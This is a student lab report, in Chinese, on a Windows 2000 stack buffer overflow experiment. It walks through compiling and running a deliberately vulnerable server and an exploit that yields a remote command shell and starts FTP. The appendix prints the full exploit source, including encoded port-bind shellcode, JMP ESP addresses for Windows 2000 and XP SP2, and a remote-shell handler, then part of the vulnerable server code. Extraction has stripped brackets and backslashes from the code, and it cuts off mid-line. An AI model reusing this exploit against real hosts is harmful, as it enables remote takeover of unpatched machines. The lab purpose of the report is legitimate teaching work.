网络安全缓冲区溢出技术实验报告

1、网络实验报告学生姓名学号组员：实验项目Windows缓冲区溢出测试一、实验目的及要求1、目的了解和掌握Win32平台缓冲区溢出原理；学会使用Win32平台Shellcode技术。2、内容及要求以windows 2000 server虚拟机为测试对象，修改server.cpp和exploit.c，利用shellcode port bind给出的shellcode,远程获得CMD,并启动目标机器的ftp服务。二、仪器用具计算机（分别装有windows server 2000和windows 7操作系统），本实验使用的是虚拟机Wmware8.0在同一台电脑上面安装两个操作系统。三、实验方法与步骤在实

2、验开始前，首先编写可能产生缓冲区溢出的程序(server.cpp)和测试程序(exploit.c)。在server.cpp中能够产生缓冲区溢出的程序片段如下：void overflow(char * s,int size) char s150; printf("receive %d bytes",size); ssize=0; strcpy(s1,s);这两个程序的完整代码见附件。由于本实验是在虚拟机环境下测试的，所以在开始实验前，分别记下两个系统的IP地址：运行server程序的系统IP地址为：31运行exploit程序的系统IP地址为：192.

3、168.209.1实验的过程如下：1. 在windows2000系统下分别编译server.cpp和exploit.c程序，详细过程如下：C:test>cl server.cppC:test>cl exploit.c编译完成后分别产生exploit.exe、exploit.obj、server.exe、server.obj截图如下图1所示：图 12. 在windows2000系统中运行服务程序：server.cppC:test>server.exe截图如下图2所示：图 23. 将编译好的exploit程序拷贝到windows 7系统中来测试4. 在windows 7系统中运行

4、exploit.exe程序，如下D:clientexploit.exe 31 8888截图如下图3所示：图 3这样就可以获得目标主机的CMD了，接下来的任务是开启目标主机的FTP服务。5. 紧接着上面的步骤，在获得CMD的情况下，运行如下的命令来开启目标机器的FTP服务C:test>net start “ftp publishing service”截图如下图4所示：图 4四、实验结果及讨论从上面的截图可以看出，实验通过exploit.exe程序顺利的获取了目标机器的CMD并启动FTP服务。由于不同的系统下JMP跳转指令的地址不相同，因此在windows xp与

5、windows 2000程序的差别在于#define JUMPESP的定义。windows2000下可以采用如下的定义：#define JUMPESP "x12x45xfax7f"windows xp sp2可以采用下面的定义：#define JUMPESP "xedx1ex96x7c"由于程序是使用VC6编译器来编译的，它保持4字节栈对齐，因此服务程序server.cpp并不需要任何改动。五、附录exploit.c程序代码#include <stdio.h>#include <stdlib.h>#include <wind

6、ows.h>#pragma comment (lib,"ws2_32")/ jmp esp address of chinese version#define JUMPESP "x12x45xfax7f"char shellcode ="xebx10x5bx4bx33xc9x66xb9x23x01x80x34x0bxf8xe2xfa""xebx05xe8xebxffxffxffx11x01xf8xf8xf8xa7x9cx59xc8""xf8xf8xf8x73xb8xf4x73x88xe4x55x73

7、x90xf0x73x0fx92""xfbxa1x10x61xf8xf8xf8x1ax01x90xcbxcaxf8xf8x90x8f""x8bxcaxa7xacx07xeex73x10x92xfdxa1x10x78xf8xf8xf8""x1ax01x79x14x68xf9xf8xf8xacx90xf9xf9xf8xf8x07xae""xf4xa8xa8xa8xa8x92xf9x92xfax07xaexe8x73x20xcbx38""xa8xa8x90xfaxf8xe9xa4x73x34x92xe8

8、xa9xabx07xaexec""x92xf9xabx07xaexe0xa8xa8xabx07xaexe4x73x20x90x9b""x95x9cxf8x75xecxdcx7bx14xacx73x04x92xecxa1xcbx38""x71xfcx77x1ax03x3exbfxe8xbcx06xbfxc4x06xbfxc5x71""xa7xb0x71xa7xb4x71xa7xa8x75xbfxe8xafxa8xa9xa9xa9""x92xf9xa9xa9xaaxa9x07xaexfcxcbx38

9、xb0xa8x07xaexf0""xa9xaex73x8dxc4x73x8cxd6x80xfbx0dxaex73x8exd8xfb""x0dxcbx31xb1xb9x55xfbx3dxcbx23xf7x46xe8xc2x2ex8c""xf0x39x33xffxfbx22xb8x13x09xc3xe7x8dx1fxa6x73xa6""xdcxfbx25x9ex73xf4xb3x73xa6xe4xfbx25x73xfcx73xfb""x3dx53xa6xa1x3bx10xfax07x07x07xca

10、x8cx69xf4x31x44""x5ex93x77x0axe0x99xc5x92x4cx78xd5xcax80x26x9cxe8""x5fx25xf4x67x2bxb3x49xe6x6fxf9"/ ripped from isnoint Make_Connection(char *address,int port,int timeout) struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,

11、SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr=0) closesocket(s); return -2; target.sin_port = htons(port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET

12、(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target); if(i=select(s+1,0,&wd,0,&tv)=(-1) closesocket(s); return -3; if(i=0) closesocket(s); return -4; i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); if(bf!=0)|(i!=sizeof(int) closesocket(s); return -5

13、; ioctlsocket(s,FIONBIO,&bf); return s;/* ripped from TESO code and modifed by ey4s for win32 */void shell (int sock) int l; char buf512; struct timeval time; unsigned long ul2; time.tv_sec = 1; time.tv_usec = 0; while (1) ul0 = 1; ul1 = sock; l = select (0, (fd_set *)&ul, NULL, NULL, &t

14、ime); if(l=1) l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) printf ("- Connection closed.n"); return; l = write (1, buf, l); if (l <= 0) printf ("- Connection closed.n"); return; else l = read (0, buf, sizeof (buf); if (l <= 0) printf("- Connection closed.n&quo

15、t;); return; l = send(sock, buf, l, 0); if (l <= 0) printf("- Connection closed.n"); return; int main(int argc, char *argv) SOCKET c,s; WSADATA WSAData; char Buff1024; if (argc < 3) fprintf(stderr, "Usage: %s remote_addr remote_port", argv0); exit(1); if(WSAStartup (MAKEWOR

16、D(1,1), &WSAData) != 0) printf("- WSAStartup failed.n"); WSACleanup(); exit(1); memset(Buff, 0x90, sizeof(Buff)-1); strcpy(Buff+56, JUMPESP); strcpy(Buff+60, shellcode); s = Make_Connection(argv1, atoi(argv2), 10); if(s<0) printf("- connect err.n"); exit(1); send(s,Buff,si

17、zeof(Buff),0); Sleep(1000); c = Make_Connection(argv1, 4444, 10); shell(c); WSACleanup(); return 1;server.cpp程序代码#include <winsock2.h>#include <stdio.h>#pragma comment(lib,"ws2_32")char Buff2048;void overflow(char * s,int size) char s150; printf("receive %d bytes",siz

18、e); ssize=0; strcpy(s1,s);int main() WSADATA wsa; SOCKET listenFD; int ret; char asd2048; WSAStartup(MAKEWORD(2,2),&wsa); listenFD = WSASocket(2,1,0,0,0,0); struct sockaddr_in server; server.sin_family = AF_INET; server.sin_port = htons(8888); server.sin_addr.s_addr = INADDR_ANY; ret=bind(listenFD,(sockaddr *)&server,sizeof(server); ret=listen(listenFD,2); int iAddrSize = sizeof(server); SOCKET clientFD=accept(listenFD,(s